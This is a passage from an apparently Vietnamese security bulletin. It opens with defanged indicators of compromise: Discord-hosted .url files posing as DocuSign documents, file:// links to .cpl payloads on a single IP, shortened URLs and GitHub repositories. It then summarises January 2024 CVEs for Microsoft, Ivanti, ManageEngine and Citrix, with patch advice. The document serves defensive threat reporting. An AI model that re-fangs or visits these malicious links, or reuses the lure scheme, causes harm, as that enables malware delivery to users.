hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1170627584627855481/DocuSign1[.]url?ex=6559bae5&is=654745e5&hm=acf93c3a4f79068689d20d197ac297533dc28d94bb93f4ec1021c7c258c8dbda&

file[://]51[.]79[.]185[.]145/pdf/data1[.]zip/pdf1[.]cpl

file[://]51[.]79[.]185[.]145/pdf/data2[.]zip/pdf2[.]cpl

hxxps[://]shorturl[.]at/flEK5

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1167767477921513512/SecureDocuSign_pdf[.]url?ex=654f5336&is=653cde36&hm=08ea24126262ff865a1ab0c79f20e41e9e53896d9cda8e0c374c077f5a500b00&

file[://]51[.]79[.]185[.]145/pdf/data[.]zip/docusign_pdf[.]cpl

hxxps[://]shorturl[.]at/clpIO

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1171355007245893653/DocuSignDocument[.]url?ex=655c605c&is=6549eb5c&hm=2aeb65239a890e6b070957136681600ca33584e578816faeab471a5e11004538&

file[://]51[.]79[.]185[.]145/pdf/data3[.]zip/pdf3[.]cpl

hxxps[://]shorturl[.]at/eqxU0

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1175808264479449138/DocuSign3[.]url?ex=656c93c7&is=655a1ec7&hm=6e8b316f2112cfaf27bc8cf35089098e4a0f2d16054e8d199c13588c31b2e383&

file[://]51[.]79[.]185[.]145/pdf/kay[.]zip/kay[.]cpl

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1177255994775064717/kay[.]url?ex=6571d815&is=655f6315&hm=5edd3e4b0cc773a06fe9f1a8177f99239a105079f23eb7707c225be4867160df&

hxxps[://]shorturl[.]at/dMY69

hxxps[://]cdn[.]discordapp[.]com/attachments/853270434422456330/1184415259717533726/My_Photo_Album[.]url

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1177255995156742144/DocuSign4[.]url?ex=6571d815&is=655f6315&hm=f9e208714ffc862f97cb6363fb887f11fda0020802a020a56a571c4195114854&

hxxps[://]shorturl[.]at/ixEZ7

hxxps[://]cdn[.]discordapp[.]com/attachments/853270434422456330/1183676616564547624/image_reported[.]url?ex=658933c1&is=6576bec1&hm=b60477e0a798182a1dc0ea65def7305b111ce06a398667a1c567b3f9afd253b2&

file[://]51[.]79[.]185[.]145/pdf/data2[.]zip/pdf2[.]cpl

hxxps[://]shorturl[.]at/oORV9

file[://]51[.]79[.]185[.]145/pdf/data3[.]zip/pdf3[.]cpl

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1172211288303206400/DocuSign3[.]url?ex=655f7dd5&is=654d08d5&hm=26a68927b4c05c243d910f3a5ebcf2c6ec43bcb7f460acd45891b3b21b308cdc&

hxxps[://]cdn[.]discordapp[.]com/attachments/853270434422456330/1176802586481922098/image_reported[.]url

hxxps[://]shorturl[.]at/gnL15

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1170627585680609280/DocuSign3[.]url

hxxps[://]shorturl[.]at/dKOR6

hxxps[://]github[.]com/nateeintanan2527/Joyce_Data[.]git

hxxps[://]github[.]com/nateeintanan2527/Data_Document[.]git

hxxps[://]raw[.]githubusercontent[.]com/nateeintanan2527/Joyce_Data

hxxps[://]raw[.]githubusercontent[.]com/nateeintanan2527/Data_Document

IP

51[.]79[.]185[.]145

3        CVE và các khuyến nghị bảo mật

3.1      Microsoft Patch Tuesday – January 2024

Trong tháng 01, Microsoft đã phát hành các bản vá cho 49 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Office và Office Components; Azure; .NET Framework và Visual Studio; SQL Server; Windows Hyper-V; và Internet Explorer. Trong đó có 3 lỗ hổng được đánh giá mức độ Nghiêm trọng, 47 lỗ hổng được đánh giá là Important. Dưới đây là các CVE nổi bật:

3.1.1       CVE-2024-20674– Windows Kerberos Security Feature Bypass Vulnerability

CVSS: 9.0/10

Mô t: Lỗ hổng cho phép kẻ tấn công không cần xác thực, vượt qua cơ chế bảo mật trong Windows Kerberos bằng cách thiết lập cuộc tấn công như MITM hoặc kỹ thuật giả mạo mạng cục bộ. Sau đó gửi các message Kerberos độc hại đến máy nạn nhân để giả mạo.

Phiên bn nh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows 11 Version 23H2 for x64-based Systems

Windows 11 Version 23H2 for ARM64-based Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20674

3.1.2       CVE-2024-20700 – Windows Hyper-V Remote Code Execution Vulnerability.

CVSS: 7.5/10

Mô t: Tồn tại lỗ hổng race-condition, khai thác lỗ hổng thành công cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng không yêu cầu thông tin xác thực cũng như tương tác người dùng.

Phiên bản ảnh hưởng:

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows 11 Version 23H2 for x64-based Systems

Windows 11 Version 23H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for x64-based Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20700

3.1.3       CVE-2024-0056 – Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability

CVSS: 8.7/10

Mô t: Khai thác lỗ hổng thành công cho phép kẻ tấn công thực hiện cuộc tấn công MITM, cho phép giải mã hoặc sửa đổi lưu lượng TLS giữa máy khách và máy chủ.

Phiên bản ảnh hưởng:

Microsoft .NET Framework 2.0 Service Pack 2

Microsoft .NET Framework 3.5 AND 4.8.1

Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2

Microsoft .NET Framework 3.5 AND 4.7.2

Microsoft .NET Framework 3.5 AND 4.8

Microsoft .NET Framework 4.8

Microsoft SQL Server 2022 for x64-based Systems (CU 10)

Microsoft Visual Studio 2022 version 17.8

Microsoft Visual Studio 2022 version 17.6

Microsoft Visual Studio 2022 version 17.4

Microsoft Visual Studio 2022 version 17.2

System.Data.SqlClient

Microsoft.Data.SqlClient 5.1

Microsoft.Data.SqlClient 4.0

Microsoft.Data.SqlClient 3.1

Microsoft.Data.SqlClient 2.1

.NET 8.0

.NET 7.0

.NET 6.0

Microsoft SQL Server 2022 for x64-based Systems (GDR)

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0056

3.2      Ứng Dụng Web Và Các Sản Phẩm Khác

3.2.1       CVE-2023-46805 – Authentication Bypass Vulnerability

CVSS: 8.2/10

Mô t: Tồn tại lỗ hổng vượt qua xác thực trong web component của Ivanti ICS 9x, 22.x và Ivanti Policy Secure cho phép kẻ tấn công truy cập vào các tài nguyên quan trọng của hệ thống.

Phiên bn nh hưởng:

Ivanti Connect Secure

Ivanti Policy Secure Gateways

Khuyến nghị: Thực hiện rà soát các máy chủ bị ảnh hưởng lên kế hoạch thực hiện các giảm thiểu và các bản cập nhât đã phát hành theo hướng dẫn của hãng:

https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

3.2.2       CVE-2024-21887– Command Injection Vulnerability

CVSS: 9.1/10

Mô t: Tồn tại lỗ hổng command injection trong web component của Ivanti ICS 9x, 22.x và Ivanti Policy Secure cho phép kẻ tấn công thực thi các lệnh tùy ý trên hệ thống bị ảnh hưởng.

Phiên bn nh hưởng:

Ivanti Connect Secure

Ivanti Policy Secure Gateways

Khuyến nghị: Thực hiện rà soát các máy chủ bị ảnh hưởng lên kế hoạch thực hiện các giảm thiểu và các bản cập nhât đã phát hành theo hướng dẫn của hãng:

https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

3.2.3       CVE-2023-47211 – ManageEngine OpManager uploadMib Path Traversal Vulnerability

CVSS: 9.1/10

Mô t: Tồn tại lỗ hổng Path Traversal trong tính năng UploadMib của ManaEngine OpManager cho phép kẻ tấn công tạo file tùy ý bằng cách tải lên tệp tin MiB độc hại.

Phiên bn nh hưởng:

OpManager

OpManager Plus

OpManager MSP

Network Configuration Manager

NetFlow Analyzer

Firewall Analyzer

OpUtils.

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://www.manageengine.com/itom/advisory/cve-2023-47211.html

3.2.4       CVE-2023-6548 – Citrix NetScaler ADC and Gateway Authenticated Remote Code Execution (RCE) Vulnerability.

CVSS: 5.5/10

Mô t: Tồn tại lỗ hổng Code Injection trong NetScaler ADC và NetScaler Gateway cho phép kẻ tấn công có quyền truy cập tới tới giao diện quản trị của NetScaler IP (NSIP), Subnet IP (SNIP) hoặc CLIP (Cluster management IP), từ đó thực thi mã từ xa với đặc quyền thấp. Lỗ hổng được hãng ghi nhân đang được sử dụng bởi các nhóm tấn công

Phiên bn nh hưởng:

NetScaler ADC và NetScaler Gateway 14.1 trước phiên bản 14.1-12.35

NetScaler ADC và NetScaler Gateway 13.1 trước phiên bản 13.1-51.15

NetScaler ADC và NetScaler Gateway 13.0 trước phiên bản 13.0-92.21

NetScaler ADC 13.1-FIPS trước phiên bản 13.1-37.176

NetScaler ADC 12.1-FIPS trước phiên bản 12.1-55.302

NetScaler ADC 12.1-NDcPP trước phiên bản 12.1-55.302OpManager MSP

Lưu ý: NetScaler ADC and NetScaler Gateway phiên bản 12.1 hiện tại không còn được hỗ trợ từ hãng, do đó cũng tồn tại lỗ hổng

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549

3.2.5       CVE- 2023-6549 – Citrix NetScaler ADC and Gateway Denial of Service Vulnerability.

CVSS: 8.2/10

Mô t: Tồn tại lỗ hổng Bounds of a Memory Buffer trong NetScaler ADC và NetScaler Gateway cho phép kẻ tấn công thực hiện tấn công từ chối dịch vụ (DoS). Khai thác lỗ hổng yêu cầu các ứng dung cấu hình như là một Gateway (ví du như VPN, ICA Proxy, CVPN, RDP Proxy) hoặc AAA virtual server). Lỗ hổng được hãng ghi nhân đang được sử dụng bởi các nhóm tấn công.

Phiên bn nh hưởng:

NetScaler ADC và NetScaler Gateway 14.1 trước phiên bản 14.1-12.35

NetScaler ADC và NetScaler Gateway 13.1 trước phiên bản 13.1-51.15

NetScaler ADC và NetScaler Gateway 13.0 trước phiên bản 13.0-92.21

NetScaler ADC 13.1-FIPS trước phiên bản 13.1-37.176

NetScaler ADC 12.1-FIPS trước phiên bản 12.1-55.302

NetScaler ADC 12.1-NDcPP trước phiên bản 12.1-55.302

Lưu ý: NetScaler ADC and NetScaler Gateway phiên bản 12.1 hiện tại không còn được hỗ trợ từ hãng, do đó cũng tồn tại lỗ hổng

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549